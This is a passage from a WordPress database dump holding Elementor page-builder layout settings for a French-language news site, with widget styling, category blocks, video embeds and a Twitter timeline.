",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2327,752,'_elementor_version','0.4'),(2328,752,'_elementor_css','a:3:{s:4:\"time\";i:1509369710;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2329,753,'_elementor_edit_mode','builder'),(2330,753,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\